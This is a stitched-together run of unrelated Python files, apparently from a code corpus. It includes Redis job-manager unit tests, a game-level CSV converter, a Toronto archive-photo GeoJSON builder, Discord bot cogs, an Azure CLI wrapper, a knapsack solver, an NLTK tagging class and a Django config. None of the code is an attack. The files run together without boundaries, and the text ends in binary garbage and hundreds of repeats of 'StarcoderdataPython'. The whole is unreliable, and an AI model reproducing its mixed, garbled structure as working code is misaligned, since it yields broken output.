module""" import datetime import importlib import os import secrets import time import unittest import unittest.mock import uuid import aiounittest import linear_algebra from parallel_accel.shared import schemas import redis from src.redis import jobs class TestJobsManager(aiounittest.AsyncTestCase): """Tests JobsManager class behavior.""" API_KEY = secrets.token_hex(16) DEADLINE = datetime.timedelta(seconds=100) JOB_ID = uuid.uuid4() @classmethod def setUpClass(cls) -> None: """See base class documentation.""" cls.patchers = [] cls.mocked_time = unittest.mock.Mock(spec=time.time) cls.mocked_time.return_value = 0 patcher = unittest.mock.patch("time.time", cls.mocked_time) cls.patchers.append(patcher) cls.mocked_redis = unittest.mock.Mock(spec=redis.Redis) cls.mocked_redis.return_value = cls.mocked_redis patcher = unittest.mock.patch("redis.Redis", cls.mocked_redis) cls.patchers.append(patcher) for patcher in cls.patchers: patcher.start() importlib.reload(jobs) os.environ["REDISHOST"] = "localhost" cls.manager = jobs.JobsManager() @classmethod def tearDownClass(cls) -> None: """See base class documentation.""" del os.environ["REDISHOST"] for patcher in cls.patchers: patcher.stop() def tearDown(self) -> None: """See base class documentation.""" for mock in [x for x in dir(self) if x.startswith("mocked_")]: getattr(self, mock).reset_mock() def test_create_job(self) -> None: """Tests create_job method behavior.""" # Test setup data = schemas.SampleJobContext( acyclic_graph=linear_algebra.Graph(linear_algebra.flip_z_axis(linear_algebra.GridSpace(1, 1))), param_resolver=linear_algebra.ParamResolver(None), ) context = schemas.encode(schemas.SampleJobContextSchema, data) job_type = schemas.JobType.SAMPLE self.mocked_redis.set.return_value = True self.mocked_redis.rpush.return_value = True # Run test job_uuid = self.manager.create_job(self.API_KEY, job_type, context) # Verification ## Verify Redis SET calls data = schemas.Job( api_key=self.API_KEY, context=context, id=job_uuid, type=job_type ) serialized_data = schemas.encode(schemas.JobSchema, data) expected_call_args = [ ( ( jobs.JobsManager.KeyType.CONTEXT.key_for(job_uuid), serialized_data, datetime.timedelta(days=7), ), ), ] data = schemas.JobResult(job_uuid, schemas.JobStatus.NOT_STARTED) serialized_data = schemas.encode(schemas.JobResultSchema, data) expected_call_args.append( ( ( jobs.JobsManager.KeyType.STATUS.key_for(job_uuid), serialized_data, datetime.timedelta(days=7), ), ) ) self.assertEqual( self.mocked_redis.set.call_args_list, expected_call_args ) ## Verify Redis RPUSH calls expected_call_args = [ ( ( jobs.JobsManager.KeyType.QUEUE.key_for(job_uuid), serialized_data, ), ), ( ( self.API_KEY, job_uuid, ), ), ] self.assertEqual( self.mocked_redis.rpush.call_args_list, expected_call_args ) ## Verify Redis EXPIRE calls args = [jobs.JobsManager.KeyType.QUEUE.key_for(job_uuid), self.API_KEY] expected_call_args = [((x, datetime.timedelta(days=7)),) for x in args] self.assertEqual( self.mocked_redis.expire.call_args_list, expected_call_args ) def test_create_job_failed_to_create_key(self) -> None: """Tests create_job method behavior: failed to create job context key""" # Test setup data = schemas.SampleJobContext( acyclic_graph=linear_algebra.Graph(linear_algebra.flip_z_axis(linear_algebra.GridSpace(1, 1))), param_resolver=linear_algebra.ParamResolver(None), ) context = schemas.encode(schemas.SampleJobContextSchema, data) job_type = schemas.JobType.SAMPLE self.mocked_redis.set.return_value = False # Run test with self.assertRaises(jobs.SetJobContextError): self.manager.create_job(self.API_KEY, job_type, context) def test_flush_job_queue(self) -> None: """Tests flush_job_queue method behavior.""" # Test setup self.mocked_redis.exists.return_value = 1 self.mocked_redis.llen.return_value = 1 self.mocked_redis.lrange.return_value = [str(self.JOB_ID)] # Run test self.manager.flush_job_queue(self.API_KEY) # Verification self.mocked_redis.exists.assert_called_once_with(self.API_KEY) self.mocked_redis.llen.assert_called_once_with(self.API_KEY) self.mocked_redis.lrange.assert_called_once_with(self.API_KEY, 0, 1) call_args_list = [((self.API_KEY,),)] + [ ((x.key_for(str(self.JOB_ID)),),) for x in jobs.JobsManager.KeyType ] self.assertEqual( self.mocked_redis.delete.call_args_list, call_args_list ) def test_flush_job_queue_not_found(self) -> None: """Tests flush_job_queue method behavior: queue not found.""" # Test setup self.mocked_redis.exists.return_value = 0 # Run test self.manager.flush_job_queue(self.API_KEY) # Verification self.mocked_redis.exists.assert_called_once_with(self.API_KEY) for command in ("delete", "llen", "lrange"): getattr(self.mocked_redis, command).assert_not_called() def test_get_job_queue(self) -> None: """Tests get_job_queue method behavior.""" # Test setup self.mocked_redis.exists.return_value = 1 self.mocked_redis.llen.return_value = 1 self.mocked_redis.lrange.return_value = [str(self.JOB_ID)] # Run test queue = self.manager.get_job_queue(self.API_KEY) # Verification self.assertEqual(queue.ids, [str(self.JOB_ID)]) self.mocked_redis.exists.assert_called_once_with(self.API_KEY) self.mocked_redis.llen.assert_called_once_with(self.API_KEY) self.mocked_redis.lrange.assert_called_once_with(self.API_KEY, 0, 1) def test_get_job_queue_not_exists(self) -> None: """Tests get_job_queue method behavior.""" # Test setup self.mocked_redis.exists.return_value = 0 # Run test queue = self.manager.get_job_queue(self.API_KEY) # Verification self.assertEqual(queue.ids, []) self.mocked_redis.exists.assert_called_once_with(self.API_KEY) for command in ("llen", "lrange"): getattr(self.mocked_redis, command).assert_not_called() async def test_subscribe_job_status(self) -> None: """Tests subscribe_job_status method behavior.""" # Test setup job_id = str(self.JOB_ID) job_results = [ schemas.JobResult( id=self.JOB_ID, status=schemas.JobStatus.IN_PROGRESS, progress=schemas.JobProgress(), ), schemas.JobResult( self.JOB_ID, schemas.JobStatus.ERROR, error_message="error" ), ] serialized_job_results = [ schemas.encode(schemas.JobResultSchema, x) for x in job_results ] self.mocked_redis.blpop.side_effect = [ (job_id, x) for x in serialized_job_results ] self.mocked_redis.exists.return_value = 1 # Run test async for status in self.manager.subscribe_job_status( job_id, self.DEADLINE ): self.assertEqual(status, job_results.pop(0)) # Verification self.mocked_redis.exists.assert_called_once_with( jobs.JobsManager.KeyType.CONTEXT.key_for(job_id) ) self.assertEqual( self.mocked_redis.blpop.call_args_list, [ ( (jobs.JobsManager.KeyType.QUEUE.key_for(job_id),), { "timeout": ( self.DEADLINE - datetime.timedelta( seconds=self.mocked_time.return_value ) ).total_seconds() }, ) ] * 2, ) self.mocked_redis.delete.assert_called_once_with( jobs.JobsManager.KeyType.CONTEXT.key_for(job_id) ) async def test_subscribe_job_status_context_not_found(self) -> None: """Tests subscribe_job_status method behavior: job not found.""" # Test setup job_id = str(self.JOB_ID) self.mocked_redis.exists.return_value = 0 # Run test with self.assertRaises(jobs.shared_redis.JobNotFoundError): async for _ in self.manager.subscribe_job_status( job_id, self.DEADLINE ): pass # Verification self.mocked_redis.exists.assert_called_once_with( jobs.JobsManager.KeyType.CONTEXT.key_for(job_id) ) self.assertFalse(self.mocked_redis.blpop.called) self.assertFalse(self.mocked_redis.delete.called) async def test_subscribe_job_status_timeout(self) -> None: """Tests subscribe_job_status method behavior: BLPOP timed out.""" # Test setup job_id = str(self.JOB_ID) self.mocked_redis.exists.return_value = 1 self.mocked_redis.blpop.side_effect = [None] # Run test async for status in self.manager.subscribe_job_status( job_id, self.DEADLINE ): self.assertIsNone(status) # Verification self.mocked_redis.exists.assert_called_once_with( jobs.JobsManager.KeyType.CONTEXT.key_for(job_id) ) self.mocked_redis.blpop.called_once_with( jobs.JobsManager.KeyType.QUEUE.key_for(job_id), timeout=( self.DEADLINE - datetime.timedelta(seconds=self.mocked_time.return_value) ).total_seconds(), ) self.assertFalse(self.mocked_redis.delete.called) def test_get_job_status(self) -> None: """Tests get_job_status method behavior""" # Test setup job_id = str(self.JOB_ID) self.mocked_redis.exists.return_value = 1 result = schemas.JobResult( id=self.JOB_ID, status=schemas.JobStatus.NOT_STARTED ) serialized = schemas.encode(schemas.JobResultSchema, result) self.mocked_redis.get.return_value = serialized # Run test job_status = self.manager.get_job_status(job_id) # Verification self.assertEqual(job_status, result.status) self.mocked_redis.get.assert_called_once_with( jobs.JobsManager.KeyType.STATUS.key_for(job_id) ) def test_get_job_status_not_found(self) -> None: """Tests get_job_status method behavior: job not found.""" # Test setup job_id = str(self.JOB_ID) self.mocked_redis.exists.return_value = 0 # Run test with self.assertRaises(jobs.shared_redis.JobResultNotFoundError): self.manager.get_job_status(job_id) # Verification self.mocked_redis.get.assert_not_called() def test_get_job_type(self) -> None: """Tests get_job_type method behavior""" # Test setup job_id = str(self.JOB_ID) self.mocked_redis.exists.return_value = 1 context = schemas.SampleJobContext( acyclic_graph=linear_algebra.Graph(linear_algebra.flip_z_axis(linear_algebra.GridSpace(1, 1))), param_resolver=linear_algebra.ParamResolver(None), ) job = schemas.Job( api_key=self.API_KEY, context=context, id=self.JOB_ID, type=schemas.JobType.SAMPLE, ) serialized = schemas.encode(schemas.SampleJobSchema, job) self.mocked_redis.get.return_value = serialized # Run test job_type = self.manager.get_job_type(job_id) # Verification self.assertEqual(job_type, job.type) self.mocked_redis.exists.assert_called_once_with( jobs.JobsManager.KeyType.CONTEXT.key_for(job_id) ) self.mocked_redis.get.assert_called_once_with( jobs.JobsManager.KeyType.CONTEXT.key_for(job_id) ) def test_get_job_type_not_found(self) -> None: """Tests get_job_type method behavior: job not found.""" # Test setup job_id = str(self.JOB_ID) self.mocked_redis.exists.return_value = 0 # Run test with self.assertRaises(jobs.shared_redis.JobNotFoundError): self.manager.get_job_type(job_id) # Verification self.mocked_redis.exists.assert_called_once_with( jobs.JobsManager.KeyType.CONTEXT.key_for(job_id) ) def test_has_job_queue(self) -> None: """Tests has_job_queue method behavior""" # Test setup self.mocked_redis.exists.return_value = 1 # Run test result = self.manager.has_jobs_queue(self.API_KEY) # Verification self.assertTrue(result) self.mocked_redis.exists.assert_called_once_with(self.API_KEY) def test_has_pending_job(self) -> None: """Tests has_pending_job method behavior""" # Test setup self.mocked_redis.exists.return_value = 1 self.mocked_redis.llen.return_value = 1 self.mocked_redis.lrange.return_value = [str(self.JOB_ID)] # Run test result = self.manager.has_pending_job(self.API_KEY, self.JOB_ID) # Verification self.assertTrue(result) call_args_list = [((self.API_KEY,),)] * 2 self.assertEqual( self.mocked_redis.exists.call_args_list, call_args_list ) self.mocked_redis.llen.assert_called_once_with(self.API_KEY) self.mocked_redis.lrange.assert_called_once_with(self.API_KEY, 0, 1) def test_has_pending_job_no_queue(self) -> None: """Tests has_pending_job method behavior: no job queue""" # Test setup self.mocked_redis.exists.return_value = 0 # Run test result = self.manager.has_pending_job(self.API_KEY, self.JOB_ID) # Verification self.assertFalse(result) self.mocked_redis.exists.assert_called_once_with(self.API_KEY) for command in ("llen", "lrange"): getattr(self.mocked_redis, command).assert_not_called() def test_is_same_api_key(self) -> None: """Tests is_same_api_key method behavior.""" # Test setup self.mocked_redis.exists.return_value = 1 context = schemas.SampleJobContext( acyclic_graph=linear_algebra.Graph(linear_algebra.flip_z_axis(linear_algebra.GridSpace(1, 1))), param_resolver=linear_algebra.ParamResolver(None), ) job = schemas.Job( api_key=self.API_KEY, context=context, id=self.JOB_ID, type=schemas.JobType.SAMPLE, ) serialized = schemas.encode(schemas.SampleJobSchema, job) self.mocked_redis.get.return_value = serialized # Run test self.assertTrue(self.manager.is_same_api_key(self.JOB_ID, self.API_KEY)) self.assertFalse( self.manager.is_same_api_key( self.JOB_ID, self.API_KEY + self.API_KEY ) ) def test_is_same_job_type(self) -> None: """Tests is_same_job_type method behavior.""" # Test setup self.mocked_redis.exists.return_value = 1 context = schemas.SampleJobContext( acyclic_graph=linear_algebra.Graph(linear_algebra.flip_z_axis(linear_algebra.GridSpace(1, 1))), param_resolver=linear_algebra.ParamResolver(None), ) job = schemas.Job( api_key=self.API_KEY, context=context, id=self.JOB_ID, type=schemas.JobType.SAMPLE, ) serialized = schemas.encode(schemas.SampleJobSchema, job) self.mocked_redis.get.return_value = serialized # Run test self.assertTrue( self.manager.is_same_job_type(self.JOB_ID, schemas.JobType.SAMPLE) ) self.assertFalse( self.manager.is_same_job_type( self.JOB_ID, schemas.JobType.EXPECTATION ) ) import csv def tryConvertToInt(s): s = s.strip() if len(s) == 0: return 0 return int(s) levelDict = {} with open("levels.csv") as lvl: reader = csv.reader(lvl) for rownum, row in enumerate(reader): if rownum == 0: print "header:", row else: levelNum = int(row[0]) levelName = row[1] numAsteroids = tryConvertToInt(row[2]) numStatCoins = tryConvertToInt(row[3]) timeLimitSeconds = tryConvertToInt(row[4]) numMobileCoins = tryConvertToInt(row[5]) numSaucersBig = tryConvertToInt(row[6]) numSaucersSmall = tryConvertToInt(row[7]) print "read wave desc:", levelNum print "wave name: ", levelName print "num asteroids: ", numAsteroids levelDesc = {'level num' : levelNum, 'level name' : levelName, 'numAsteroids' : numAsteroids, 'numStatCoins' : numStatCoins, 'timeLimitSeconds' : timeLimitSeconds, 'numMobileCoins' : numMobileCoins, 'numSaucersBig' : numSaucersBig, 'numSaucersSmall' : numSaucersSmall} levelDict[levelNum] = levelDesc keys = sorted(levelDict.keys()) for k in keys: desc = levelDict[k] print ' makeLevelDesc(world, {0}, "{1}", {2}, {3}, {4}, {5}, {6}, {7});'.format( desc['level num'], desc['level name'], desc['numAsteroids'], desc['numStatCoins'], desc['timeLimitSeconds'], desc['numMobileCoins'], desc['numSaucersBig'], desc['numSaucersSmall']) patcon/oldto #!/usr/bin/env python3 """Collect data on all the images into a GeoTempoJSON file. Inputs: data/images.ndjson data/geocode_results.json data/image-sizes.txt Output: data/images.geojson """ import argparse import json import os import pandas as pd from date_distribution import parse_year from toronto_archives import SHORT_URL_PATTERN from utils.generators import read_ndjson_file def load_image_sizes(sizes_file): """Load image sizes into a path --> [width, height] dict.""" # The image sizes file is the output of something like # identify 'images/*.jpg' > image-sizes.txt # A sample line looks like: # images/f0124_fl0001_id0001.jpg JPEG 1050x715 1050x715+0+0 8-bit sRGB 122804B 0.000u 0:00.009 path_to_dimensions = {} for line in open(sizes_file): parts = line.split(' ') path = os.path.basename(parts[0]) dims = [int(x) for x in parts[2].split('x')] path_to_dimensions[path] = dims return path_to_dimensions def get_thumbnail_url(image_url): base_url = 'https://storage.googleapis.com/sidewalk-old-toronto/thumbnails/' ext = 'jpg' filename = os.path.splitext(os.path.basename(image_url))[0] return os.path.join(base_url, '{}.{}'.format(filename, ext)) def get_mirror_url(image_url): base_url = 'https://storage.googleapis.com/sidewalk-old-toronto/images/' ext = 'jpg' filename = os.path.splitext(os.path.basename(image_url))[0] return os.path.join(base_url, '{}.{}'.format(filename, ext)) def load_patch_csv(patch_csv): """ Load the patch csv as a dict. All photo's that have an explicit lat, lng value are returned. Photo's occuring more than once are returned with a value of None unless their Fixed column is set to the 'Yes' (case sensitive). Args: patch_csv: path or remote spec of the csv Returns: A dictionary keyed by photo id. If the value is None, skip this record; if it contains a tuple, use that as an override value for lat, lng """ data = pd.read_csv(patch_csv, dtype={'Fixed': object}) fixed = set(data[data['Fixed'] == 'Yes']['Photo Id']) photo_id_to_lat_lng = {} for _, row in data[pd.notnull(data['Lat']) & pd.notnull(data['Lng'])].iterrows(): lat_lng = (row['Lat'], row['Lng']) photo_id = row['Photo Id'] if photo_id_to_lat_lng.get(photo_id, lat_lng) != lat_lng: raise ValueError(f'Ambiguous fix for {photo_id}') photo_id_to_lat_lng[photo_id] = lat_lng photo_counts = data['Photo Id'].value_counts() occurs_often = set(photo_counts[photo_counts > 1].index) # Conctruct the return dict by checking for each in either photo_id_to_lat_lng or # occurs_often if they are in fixed and if not lookup their value: all_keys = occurs_often.union(photo_id_to_lat_lng.keys()) return {str(key): photo_id_to_lat_lng.get(key) for key in all_keys if key not in fixed} if __name__ == '__main__': parser = argparse.ArgumentParser('Collect data on all the images into a GeoTempoJSON file.') parser.add_argument('--parent_data', type=str, help='mapping uniqueID to metadata scraped from parent series/fonds/etc', default='data/parent_mined_data.json') parser.add_argument('--geocode_results', type=str, help='json results from geocoding files', default='data/geocode_results.json') parser.add_argument('--path_to_size', type=str, help='txt file containing size in pixels of each images.', default='data/image-sizes.txt') parser.add_argument('--output', type=str, help='geojson encoded version of geocodes and images metadata', default='data/images.geojson') parser.add_argument('--patch_csv', type=str, help='path to a csv to override lat/lngs. Can be local or remote. ' 'rows with missing lat/lngs will be skipped in the output.', default='data/Old Toronto Responses - Override Sheet.csv') args = parser.parse_args() parent_data = json.load(open(args.parent_data)) id_to_geocode = json.load(open(args.geocode_results)) path_to_size = load_image_sizes(args.path_to_size) num_total = 0 num_missing_ids = 0 num_missing_images = 0 num_processed = 0 num_with_dates = 0 num_with_geocodes = 0 num_with_parent_geocodes = 0 num_invalid = 0 num_excluded_csv = 0 patch_csv = load_patch_csv(args.patch_csv) features = [] for record in read_ndjson_file('data/images.ndjson'): num_total += 1 id_ = record.get('uniqueID') if not id_: num_missing_ids += 1 continue if not record.get('imageLink'): num_missing_images += 1 continue patched = patch_csv.get(id_, '') if patched is None: num_excluded_csv += 1 continue parent_rec = parent_data.get(id_, {}) num_processed += 1 geocode = id_to_geocode.get(id_) if not geocode and 'lat' in parent_rec: geocode = parent_rec num_with_parent_geocodes += 1 if geocode: num_with_geocodes += 1 if patched: geocode['lat'], geocode['lng'] = patched year_range = parse_year(record.get('date', parent_rec.get('date', ''))) year = None if year_range: num_with_dates += 1 year = year_range[0] or year_range[1] # TODO(danvk): represent the range itself. image_url = record.get('imageLink') assert image_url dims = path_to_size.get(os.path.basename(image_url)) # If dims is none it means that ImageMagick was not able to parse the image so it doesn't # appear in our image dimension list. This could be because the image was corrupt, or did # not exist on the original website. Regardless, it can't be displayed. if dims is None: num_invalid += 1 continue features.append({ 'id': id_, 'type': 'Feature', 'geometry': { 'type': 'Point', 'coordinates': [geocode['lng'], geocode['lat']], } if geocode else None, 'properties': { 'title': record.get('title'), 'date': str(year) if year else None, 'url': SHORT_URL_PATTERN % id_, 'geocode': geocode, 'image': { 'url': get_mirror_url(image_url), 'width': dims[0], 'height': dims[1], 'thumb_url': get_thumbnail_url(image_url) }, 'archives_fields': { k: record.get(k) for k in ('date', 'physical_desc', 'citation', 'condition', 'scope') } } }) print(' Total records: %s' % num_total) print(' .excluded by csv: %s' % num_excluded_csv) print(' ...invalid image: %s' % num_invalid) print(' .....missing IDs: %s' % num_missing_ids) print(' .......or images: %s' % num_missing_images) print('') print(' num processed: %s' % num_processed) print(' ...and geocodes: %s' % num_with_geocodes) print(' ...from parents: %s' % num_with_parent_geocodes) print(' ...with dates: %s' % num_with_dates) json.dump({ 'type': 'FeatureCollection', 'features': features }, open(args.output, 'w')) BioKZM/Colonist from discord.ext import commands from main import client from functions.userClass import User class OnMessage(commands.Cog): def __init__(self,client): self.client = client @commands.Cog.listener() async def on_message(self,message): channel = str(message.channel) member = message.author if not message.author.bot: if channel == "kendini-tanıt": user = User(member.id) if user.data['messageBool'] == True: channel = client.get_channel(id=910547555245494322) await channel.send(f"<@{member.id}>,<#901248994922098718> kanalında kendinizi tanıttığınız için **250 XP** kazandınız!") user.addXP(250) else: pass # await self.client.process_commands(message) def setup(client): client.add_cog(OnMessage(client)) from ... pyaz_utils import _call_az def list(): ''' Adaptive Application Controls - List ''' return _call_az("az security adaptive-application-controls list", locals()) def show(group_name): ''' Adaptive Application Controls - Get Required Parameters: - group_name -- Name of an application control VM/server group ''' return _call_az("az security adaptive-application-controls show", locals()) 10-100 import discord, random, asyncio from discord.ext import commands, tasks class Trainee(commands.Cog): def __init__(self,bot): """Trainee commands""" self.bot = bot self.guild = 681882711945641997 self.channel = 743817386792058971 self.role = 729537643951554583 self.managing_ids = [690420846774321221] self.enabled = False @commands.group(invoke_without_command=True) async def trainee(self, ctx): await ctx.send_help('trainee') @trainee.command(name='list') async def trainee_list(self, ctx): """List trainees""" role = self.bot.get_guild(self.guild).get_role(self.role) members = [member.mention for member in role.members] if len(members) == 0: return await ctx.send('no trainees :sob:') embed = ctx.embed(title='Trainees', description='\n'.join(members)) await ctx.send(embed=embed) @trainee.command(name='ping') @commands.has_guild_permissions(administrator=True) async def trainee_ping(self, ctx, toggle: bool = None): """Toggle trainee pings""" if toggle is None: toggle = not self.enabled self.enabled = toggle await ctx.send(embed=ctx.embed(title='Trainee Pinging', description="enabled" if self.enabled else "disabled")) self.ping_trainees.cancel() await asyncio.sleep(5) self.ping_trainees.start() @tasks.loop(hours=1) async def ping_trainees(self): role = self.bot.get_guild(self.guild).get_role(self.role) channel = self.bot.get_guild(self.guild).get_channel(self.channel) if self.enabled: target = random.choice([trainee.mention for trainee in role.members]) msg = await channel.send(target + ' lol') await msg.delete() async def cog_check(self, ctx): return ctx.guild.id == 681882711945641997 def setup(bot): bot.add_cog(Trainee(bot)) algorithms/0019-Knapsack/knapsack.py1-10 # Solution was based on this really nice explanation from @dcvrn: # https://www.hackerrank.com/challenges/unbounded-knapsack/forum/comments/87616 # Set this to True to enable debugging. DEBUG = False def unboundedKnapsack(targetSum, values, calculated = None): # calculated is initialized as None, instead of as {}, because of the way # Python treats default arguments: https://docs.python-guide.org/writing/gotchas/ # In summary, the calculated value is kept for different function calls and the result # for a second list (see the unit tests) are wrongly inferred from the first call. if not calculated: calculated = {} if DEBUG: print "targetSum: %s" % targetSum print "values: %s" % values print "calculated: %s" % calculated if targetSum in calculated: return calculated[targetSum] # Sort the values first, so we don't need to iterate through the whole list # on every execution. sorted_values = sorted(values) for slot in range (1, targetSum + 1): calculated[slot] = 0 for i in range(0, len(sorted_values)): value = sorted_values[i] if value == slot: calculated[slot] = value break elif value < slot: rest = slot - value result = value + unboundedKnapsack(rest, sorted_values, calculated) if result > calculated[slot]: calculated[slot] = result else: break if DEBUG: print "calculated before return: %s" % calculated print "targetSum: %s, calculated[%s]: %s" % (targetSum, targetSum, calculated[targetSum]) return calculated[targetSum] """The core of the manuscript analysis.""" import logging from io import StringIO from nltk import pos_tag from nltk.tokenize import word_tokenize logging.basicConfig( format='%(asctime)s %(levelname)s [%(filename)s:%(lineno)s - %(funcName)s()] %(message)s', level=logging.DEBUG ) ADJECTIVES = frozenset({'JJ', 'JJR', 'JJS'}) ADVERBS = frozenset({'RB', 'RBR', 'RBS', 'WRB'}) NOUNS = frozenset({'NN', 'NNS', 'NNP', 'NNPS'}) PRONOUNS = frozenset({'PRP', 'PRP$', 'WP', 'WP$'}) VERBS = frozenset({'VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ'}) CONJUNCTIONS = frozenset({'CC'}) DETERMINERS = frozenset({'DT', 'PDT', 'WDT'}) PREPOSITIONS = frozenset({'IN'}) PARTICLES = frozenset({'RP'}) INTERJECTIONS = frozenset({'UH'}) NUMBERS = frozenset({'CD'}) FOREIGN_WORDS = frozenset({'FW'}) ADS = ADJECTIVES | ADVERBS POS_TAGS = ( ADJECTIVES | ADVERBS | NOUNS | PRONOUNS | VERBS | CONJUNCTIONS | DETERMINERS | PREPOSITIONS | PARTICLES | INTERJECTIONS | NUMBERS | FOREIGN_WORDS ) class Analysis(object): def __init__(self, submitted: str): self.submitted = submitted self._tokens = None self._tags = None self._token_count = None @property def tokens(self) -> list: if self._tokens is None: self._tokens = word_tokenize(self.submitted) return self._tokens @property def tags(self) -> list: if self._tags is None: self._tags = pos_tag(self.tokens) return self._tags @property def token_count(self) -> int: if self._token_count is None: self._token_count = len([tag for tag in self.tags if tag[0] != tag[1]]) return self._token_count @property def char_count(self) -> int: return len(self.submitted) def recombine(self, show_ads: bool = False, show_pos: bool = False) -> str: with StringIO() as sfd: index = 0 for tnum, token in enumerate(self.tokens): if token in ['``', "''"]: # Refer https://stackoverflow.com/a/32197336. token = '"' while True: if index >= self.char_count: # logging.debug('Index: %s, token: "%s"', index, token) logging.error('Something went wrong. Index: %s, char_count: %s.', index, self.char_count) break elif token.startswith(self.submitted[index]): if (show_pos and self.tags[tnum][1] in POS_TAGS) or (show_ads and self.tags[tnum][1] in ADS): sfd.write('{}'.format(self.tags[tnum][1], token)) else: sfd.write(token) index += len(token) break else: sfd.write(self.submitted[index].replace('\n', '
    ')) index += 1 sfd.write(self.submitted[index:]) return sfd.getvalue() from django.apps import AppConfig class ProtecsysConfig(AppConfig): name = 'protecsys' &9L_r������� 0CVi|������':M`s������� 1DWj}������(;Nat������� 2EXk~������)<Obu�������  3FYl������*=Pcv������� ! 4 G Z m � � � � � � �   + > Q d w � � � � � � �  " 5 H [ n � � � � � � �   , ? R e x � � � � � � �  # 6 I \ o � � � � � � � -@Sfy�������$7J]p�������.ATgz�������%8K^q������� /BUh{������&9L_r������� 0CVi|������':M`s������� 1DWj}������(;Nat������� 2EXk~������)<Obu�������  3FYl������*=Pcv�������!4GZm�������+>Qdw�������"5H[n�������,?Rex������� # 6 I \ o � � � � � � � !!-!@!S!f!y!�!�!�!�!�!�!�!"$"7"J"]"p"�"�"�"�"�"�"�"##.#A#T#g#z#�#�#�#�#�#�#�#$%$8$K$^$q$�$�$�$�$�$�$�$ %%/%B%U%h%{%�%�%�%�%�%�%&&&&9&L&_&r&�&�&�&�&�&�&�& ''0'C'V'i'|'�'�'�'�'�'�'(('(:(M(`(s(�(�(�(�(�(�(�( ))1)D)W)j)})�)�)�)�)�)�)**(*;*N*a*t*�*�*�*�*StarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPython